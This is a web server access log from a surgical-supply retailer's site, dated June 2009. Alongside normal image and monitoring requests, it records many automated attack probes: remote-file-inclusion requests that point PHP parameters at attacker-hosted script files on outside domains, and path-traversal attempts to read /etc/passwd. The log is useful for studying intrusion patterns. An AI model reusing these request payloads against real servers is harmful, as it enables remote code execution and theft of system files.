154.20.15.44 - - [04/Jun/2009:00:39:27 -0400] "GET /images/head_btn-brochures.gif HTTP/1.1" 200 1768 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):Bio-ARM" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; InfoPath.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)"
154.20.15.44 - - [04/Jun/2009:00:39:27 -0400] "GET /images/head_btn-space1.gif HTTP/1.1" 200 5036 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):Bio-ARM" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; InfoPath.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)"
154.20.15.44 - - [04/Jun/2009:00:39:27 -0400] "GET /images/head_surgical-supply.gif HTTP/1.1" 200 764 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):Bio-ARM" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; InfoPath.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)"
154.20.15.44 - - [04/Jun/2009:00:39:27 -0400] "GET /images/head_btn-aboutUs.gif HTTP/1.1" 200 1459 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):Bio-ARM" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; InfoPath.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)"
154.20.15.44 - - [04/Jun/2009:00:39:27 -0400] "GET /images/head_btn-tutorials.gif HTTP/1.1" 200 1160 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):Bio-ARM" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; InfoPath.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)"
154.20.15.44 - - [04/Jun/2009:00:39:27 -0400] "GET /images/head_btn-seminars.gif HTTP/1.1" 200 1250 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):Bio-ARM" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; InfoPath.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)"
154.20.15.44 - - [04/Jun/2009:00:39:27 -0400] "GET /images/head_btn-conventions.gif HTTP/1.1" 200 1367 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):Bio-ARM" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; InfoPath.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)"
154.20.15.44 - - [04/Jun/2009:00:39:27 -0400] "GET /images/head_btn-contactUs.gif HTTP/1.1" 200 1235 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):Bio-ARM" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; InfoPath.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)"
154.20.15.44 - - [04/Jun/2009:00:39:28 -0400] "GET /images/head_btn-spacer2.gif HTTP/1.1" 200 2237 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):Bio-ARM" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; InfoPath.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)"
154.20.15.44 - - [04/Jun/2009:00:39:28 -0400] "GET /images/blend.jpg HTTP/1.1" 200 405 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):Bio-ARM" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; InfoPath.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)"
154.20.15.44 - - [04/Jun/2009:00:39:28 -0400] "GET /favicon.ico HTTP/1.1" 404 209 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; InfoPath.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)"
154.20.15.44 - - [04/Jun/2009:00:39:28 -0400] "GET /images/head_btn-shop-over.gif HTTP/1.1" 200 1473 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):Bio-ARM" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; InfoPath.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)"
154.20.15.44 - - [04/Jun/2009:00:39:28 -0400] "GET /images/head_aceLogo-over.gif HTTP/1.1" 200 1296 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):Bio-ARM" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; InfoPath.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)"
154.20.15.44 - - [04/Jun/2009:00:39:28 -0400] "GET /images/head_btn-products-over.gif HTTP/1.1" 200 1396 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):Bio-ARM" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; InfoPath.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)"
154.20.15.44 - - [04/Jun/2009:00:39:28 -0400] "GET /images/head_btn-catalog-over.gif HTTP/1.1" 200 1354 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):Bio-ARM" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; InfoPath.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)"
154.20.15.44 - - [04/Jun/2009:00:39:28 -0400] "GET /images/head_btn-brochures-over.gif HTTP/1.1" 200 1392 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):Bio-ARM" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; InfoPath.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)"
154.20.15.44 - - [04/Jun/2009:00:39:29 -0400] "GET /images/head_btn-aboutUs-over.gif HTTP/1.1" 200 1156 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):Bio-ARM" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; InfoPath.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)"
154.20.15.44 - - [04/Jun/2009:00:39:29 -0400] "GET /images/head_btn-tutorials-over.gif HTTP/1.1" 200 1097 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):Bio-ARM" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; InfoPath.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)"
154.20.15.44 - - [04/Jun/2009:00:39:29 -0400] "GET /images/head_btn-seminars-over.gif HTTP/1.1" 200 1089 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):Bio-ARM" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; InfoPath.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)"
154.20.15.44 - - [04/Jun/2009:00:39:29 -0400] "GET /images/head_btn-conventions-over.gif HTTP/1.1" 200 1195 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):Bio-ARM" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; InfoPath.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)"
154.20.15.44 - - [04/Jun/2009:00:39:29 -0400] "GET /images/head_btn-contactUs-over.gif HTTP/1.1" 200 1110 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):Bio-ARM" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; InfoPath.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)"
154.20.15.44 - - [04/Jun/2009:00:39:36 -0400] "GET /images/head_btn-products.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):Bio-ARM" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; InfoPath.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)"
154.20.15.44 - - [04/Jun/2009:00:39:36 -0400] "GET /images/login_go.gif HTTP/1.1" 304 - "http://www.acesurgical.com/products.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; InfoPath.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)"
154.20.15.44 - - [04/Jun/2009:00:39:36 -0400] "GET /images/psearch_go.gif HTTP/1.1" 304 - "http://www.acesurgical.com/products.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; InfoPath.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)"
154.20.15.44 - - [04/Jun/2009:00:39:38 -0400] "GET /images/login_go-over.gif HTTP/1.1" 304 - "http://www.acesurgical.com/products.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; InfoPath.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)"
154.20.15.44 - - [04/Jun/2009:00:39:38 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 304 - "http://www.acesurgical.com/products.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; InfoPath.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)"
74.6.8.112 - - [04/Jun/2009:00:39:46 -0400] "GET /logs/error_log.Q108020900 HTTP/1.0" 404 223 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
218.149.85.37 - - [04/Jun/2009:00:40:00 -0400] "GET /logs/access_log.Q109051800%20%20//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.webdeoro.com/webdeoroimages//newswiremedia///id.txt?? HTTP/1.1" 404 282 "-" "Mozilla/5.0"
122.153.212.195 - - [04/Jun/2009:00:40:25 -0400] "GET ///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.aet-senegal.com//administrator/components/com_dbquery/classes/DBQ/admin/id1.txt? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
122.153.212.195 - - [04/Jun/2009:00:40:29 -0400] "GET /logs/access_log.Q109052700///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.aet-senegal.com//administrator/components/com_dbquery/classes/DBQ/admin/id1.txt? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
122.153.212.195 - - [04/Jun/2009:00:40:30 -0400] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.aet-senegal.com//administrator/components/com_dbquery/classes/DBQ/admin/id1.txt? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
209.59.12.99 - - [04/Jun/2009:00:40:30 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
83.170.83.216 - - [04/Jun/2009:00:41:03 -0400] "GET /logs/access_log.Q109051800%20//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://gelora.hostse.com/gid.txt??? HTTP/1.1" 404 281 "-" "libwww-perl/5.808"
65.23.158.226 - - [04/Jun/2009:00:41:26 -0400] "GET /index.php?redir=http://www.greendream.co.in/mambo/1.txt?? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
65.23.158.226 - - [04/Jun/2009:00:41:26 -0400] "GET /logs/index.php?redir=http://www.greendream.co.in/mambo/1.txt?? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
65.23.158.226 - - [04/Jun/2009:00:41:26 -0400] "GET /logs/access_log.Q109051000%20%20/index.php?redir=http://www.greendream.co.in/mambo/1.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
65.23.158.226 - - [04/Jun/2009:00:41:30 -0400] "GET /index.php?redir=http://www.greendream.co.in/mambo/1.txt?? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
65.23.158.226 - - [04/Jun/2009:00:41:30 -0400] "GET /logs/access_log.Q109051000%20%20/index.php?redir=http://www.greendream.co.in/mambo/1.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
65.23.158.226 - - [04/Jun/2009:00:41:30 -0400] "GET /logs/index.php?redir=http://www.greendream.co.in/mambo/1.txt?? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
110.45.145.50 - - [04/Jun/2009:00:41:36 -0400] "GET /logs/error_log.Q108102500//index.php?DOCUMENT_ROOT=http://www.teampoint-koeln.de/images/cek.jpg?? HTTP/1.1" 404 234 "-" "libwww-perl/5.79"
110.45.145.50 - - [04/Jun/2009:00:41:36 -0400] "GET //index.php?DOCUMENT_ROOT=http://www.teampoint-koeln.de/images/cek.jpg?? HTTP/1.1" 404 208 "-" "libwww-perl/5.79"
110.45.145.50 - - [04/Jun/2009:00:41:36 -0400] "GET /logs//index.php?DOCUMENT_ROOT=http://www.teampoint-koeln.de/images/cek.jpg?? HTTP/1.1" 404 213 "-" "libwww-perl/5.79"
65.23.158.226 - - [04/Jun/2009:00:43:05 -0400] "GET /logs/access_log.Q109052700%20%20/index.php?redir=http://www.greendream.co.in/mambo/1.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
65.23.158.226 - - [04/Jun/2009:00:43:05 -0400] "GET /logs/access_log.Q109052700%20%20/index.php?redir=http://www.greendream.co.in/mambo/1.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
66.74.141.181 - - [04/Jun/2009:00:43:54 -0400] "GET /images/head_btn-conventions.gif HTTP/1.1" 304 - "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L0056F74A03920700265E00F+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)"
218.246.20.221 - - [04/Jun/2009:00:43:57 -0400] "GET /logs/access_log.Q109052600%20%20//components/com_mp3_allopass/allopass-error.php?mosConfig_live_site=http://hit168.com.cn/images/upload/id.txt? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
218.246.20.221 - - [04/Jun/2009:00:43:57 -0400] "GET /logs//components/com_mp3_allopass/allopass-error.php?mosConfig_live_site=http://hit168.com.cn/images/upload/id.txt? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
218.246.20.221 - - [04/Jun/2009:00:43:57 -0400] "GET //components/com_mp3_allopass/allopass-error.php?mosConfig_live_site=http://hit168.com.cn/images/upload/id.txt? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
218.246.20.221 - - [04/Jun/2009:00:43:58 -0400] "GET /logs/access_log.Q109051700%20%20//components/com_mp3_allopass/allopass-error.php?mosConfig_live_site=http://hit168.com.cn/images/upload/id.txt? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
206.225.92.50 - - [04/Jun/2009:00:44:09 -0400] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=../../../../../../../../etc/passwd HTTP/1.0" 404 270 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.1) Gecko/2008070400 SUSE/3.0.1-0.1 Firefox/3.0.1"
206.225.92.50 - - [04/Jun/2009:00:44:09 -0400] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=../../../../../../../../etc/passwd HTTP/1.0" 404 265 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.1) Gecko/2008070400 SUSE/3.0.1-0.1 Firefox/3.0.1"
206.225.92.50 - - [04/Jun/2009:00:44:09 -0400] "GET /logs/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://elgallitoingles.com/images/products/hk? HTTP/1.0" 404 269 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.1) Gecko/2008070400 SUSE/3.0.1-0.1 Firefox/3.0.1"
206.225.92.50 - - [04/Jun/2009:00:44:09 -0400] "GET /components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://elgallitoingles.com/images/products/hk? HTTP/1.0" 404 264 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.1) Gecko/2008070400 SUSE/3.0.1-0.1 Firefox/3.0.1"
211.189.18.73 - - [04/Jun/2009:00:44:54 -0400] "GET /logs/modules/My_eGallery/index.php?basepath=http://harvestusa.org///administrator//includes/id1.txt?? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
211.189.18.73 - - [04/Jun/2009:00:44:54 -0400] "GET /modules/My_eGallery/index.php?basepath=http://harvestusa.org///administrator//includes/id1.txt?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
211.189.18.73 - - [04/Jun/2009:00:44:54 -0400] "GET /logs/access_log.Q109052200/modules/My_eGallery/index.php?basepath=http://harvestusa.org///administrator//includes/id1.txt?? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
211.189.18.73 - - [04/Jun/2009:00:44:56 -0400] "GET /modules/My_eGallery/index.php?basepath=http://harvestusa.org///administrator//includes/id1.txt?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
211.189.18.73 - - [04/Jun/2009:00:44:56 -0400] "GET /logs/modules/My_eGallery/index.php?basepath=http://harvestusa.org///administrator//includes/id1.txt?? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
211.189.18.73 - - [04/Jun/2009:00:44:56 -0400] "GET /logs/access_log.Q109052200/modules/My_eGallery/index.php?basepath=http://harvestusa.org///administrator//includes/id1.txt?? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
211.189.18.73 - - [04/Jun/2009:00:44:59 -0400] "GET /logs/access_log.Q109052100/modules/My_eGallery/index.php?basepath=http://harvestusa.org///administrator//includes/id1.txt?? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
211.189.18.73 - - [04/Jun/2009:00:45:00 -0400] "GET /logs/access_log.Q109052100/modules/My_eGallery/index.php?basepath=http://harvestusa.org///administrator//includes/id1.txt?? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
209.59.12.99 - - [04/Jun/2009:00:45:31 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
110.45.145.50 - - [04/Jun/2009:00:45:40 -0400] "GET /logs/error_log.Q108102500%20//index.php?DOCUMENT_ROOT=http://www.teampoint-koeln.de/images/cek.jpg?? HTTP/1.1" 404 235 "-" "libwww-perl/5.79"
90.185.249.111 - - [04/Jun/2009:00:45:59 -0400] "GET /logs/access_log.Q109052300/?sourcedir=http://www.telsizdunyasi.com/vnc/fx29id.txt?? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
90.185.249.111 - - [04/Jun/2009:00:45:59 -0400] "GET /?sourcedir=http://www.telsizdunyasi.com/vnc/fx29id.txt?? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
90.185.249.111 - - [04/Jun/2009:00:45:59 -0400] "GET /logs/?sourcedir=http://www.telsizdunyasi.com/vnc/fx29id.txt?? HTTP/1.1" 200 4098 "-" "Mozilla/5.0"
69.50.197.106 - - [04/Jun/2009:00:46:27 -0400] "GET /administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://eurostrade.cn/fx29id1.txt?? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
69.50.197.106 - - [04/Jun/2009:00:46:27 -0400] "GET /logs/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://eurostrade.cn/fx29id1.txt?? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
69.50.197.106 - - [04/Jun/2009:00:46:27 -0400] "GET /logs/access_log.Q109050900/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://eurostrade.cn/fx29id1.txt?? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
69.50.197.106 - - [04/Jun/2009:00:46:28 -0400] "GET /administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://eurostrade.cn/fx29id1.txt?? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
69.50.197.106 - - [04/Jun/2009:00:46:28 -0400] "GET /logs/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://eurostrade.cn/fx29id1.txt?? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
69.50.197.106 - - [04/Jun/2009:00:46:29 -0400] "GET /logs/access_log.Q109050900/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://eurostrade.cn/fx29id1.txt?? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
90.185.249.111 - - [04/Jun/2009:00:46:35 -0400] "GET /logs/access_log.Q109052300%20%20/?sourcedir=http://www.telsizdunyasi.com/vnc/fx29id.txt?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
90.185.249.111 - - [04/Jun/2009:00:46:55 -0400] "GET /logs/access_log.Q109052100%20%20/?sourcedir=http://www.telsizdunyasi.com/vnc/fx29id.txt?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
211.189.18.73 - - [04/Jun/2009:00:47:35 -0400] "GET /logs/access_log.Q109052200%20%20/modules/My_eGallery/index.php?basepath=http://harvestusa.org///administrator//includes/id1.txt?? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
211.189.18.73 - - [04/Jun/2009:00:47:36 -0400] "GET /logs/access_log.Q109052200%20%20/modules/My_eGallery/index.php?basepath=http://harvestusa.org///administrator//includes/id1.txt?? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
211.189.18.73 - - [04/Jun/2009:00:47:40 -0400] "GET /logs/access_log.Q109052100%20%20/modules/My_eGallery/index.php?basepath=http://harvestusa.org///administrator//includes/id1.txt?? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
211.189.18.73 - - [04/Jun/2009:00:47:40 -0400] "GET /logs/access_log.Q109052100%20%20/modules/My_eGallery/index.php?basepath=http://harvestusa.org///administrator//includes/id1.txt?? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
69.50.197.106 - - [04/Jun/2009:00:47:49 -0400] "GET /logs/access_log.Q109050900%20%20/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://eurostrade.cn/fx29id1.txt?? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
69.50.197.106 - - [04/Jun/2009:00:47:56 -0400] "GET /logs/access_log.Q109050900%20%20/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://eurostrade.cn/fx29id1.txt?? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
69.50.197.106 - - [04/Jun/2009:00:48:35 -0400] "GET /logs/access_log.Q109052400%20%20/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://eurostrade.cn/fx29id1.txt?? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
69.50.197.106 - - [04/Jun/2009:00:48:38 -0400] "GET /logs/access_log.Q109052400%20%20/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://eurostrade.cn/fx29id1.txt?? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
220.79.47.122 - - [04/Jun/2009:00:50:15 -0400] "GET /logs/error_log.Q108110500//netcat_files/?INCLUDE_FOLDER=http://www.evlenirmisin.de/gefel.txt? HTTP/1.1" 404 238 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)"
89.188.129.126 - - [04/Jun/2009:00:50:24 -0400] "GET /logs/access_log.Q109051100%20%20//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.omsklyvr.omit.ru/id1.txt?? HTTP/1.1" 404 286 "-" "Mozilla/5.0"
89.188.129.126 - - [04/Jun/2009:00:50:24 -0400] "GET //program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.omsklyvr.omit.ru/id1.txt?? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
89.188.129.126 - - [04/Jun/2009:00:50:24 -0400] "GET /logs//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.omsklyvr.omit.ru/id1.txt?? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
69.50.197.106 - - [04/Jun/2009:00:50:27 -0400] "GET /logs/access_log.Q109052400/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://eurostrade.cn/fx29id1.txt?? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
209.59.12.99 - - [04/Jun/2009:00:50:31 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
69.50.197.106 - - [04/Jun/2009:00:50:35 -0400] "GET /logs/access_log.Q109052400/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://eurostrade.cn/fx29id1.txt?? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
220.79.47.122 - - [04/Jun/2009:00:51:46 -0400] "GET /logs/error_log.Q108110500//netcat_files/?INCLUDE_FOLDER=http://www.promodelia.com/gefel.txt? HTTP/1.1" 404 238 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0"
220.79.47.122 - - [04/Jun/2009:00:51:46 -0400] "GET //netcat_files/?INCLUDE_FOLDER=http://www.promodelia.com/gefel.txt? HTTP/1.1" 404 212 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0"
220.79.47.122 - - [04/Jun/2009:00:51:46 -0400] "GET /logs//netcat_files/?INCLUDE_FOLDER=http://www.promodelia.com/gefel.txt? HTTP/1.1" 404 217 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0"
89.188.129.126 - - [04/Jun/2009:00:51:50 -0400] "GET /logs/errors.php?error=http://www.omsklyvr.omit.ru/id1.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
89.188.129.126 - - [04/Jun/2009:00:51:50 -0400] "GET /errors.php?error=http://www.omsklyvr.omit.ru/id1.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
89.188.129.126 - - [04/Jun/2009:00:51:50 -0400] "GET /logs/access_log.Q109052400%20%20/errors.php?error=http://www.omsklyvr.omit.ru/id1.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
218.246.20.221 - - [04/Jun/2009:00:52:19 -0400] "GET /logs/access_log.Q109052600//components/com_mp3_allopass/allopass-error.php?mosConfig_live_site=http://hit168.com.cn/images/upload/id.txt? HTTP/1.1" 404 272 "-" "Mozilla/5.0"
218.246.20.221 - - [04/Jun/2009:00:52:19 -0400] "GET /logs/access_log.Q109051700//components/com_mp3_allopass/allopass-error.php?mosConfig_live_site=http://hit168.com.cn/images/upload/id.txt? HTTP/1.1" 404 272 "-" "Mozilla/5.0"
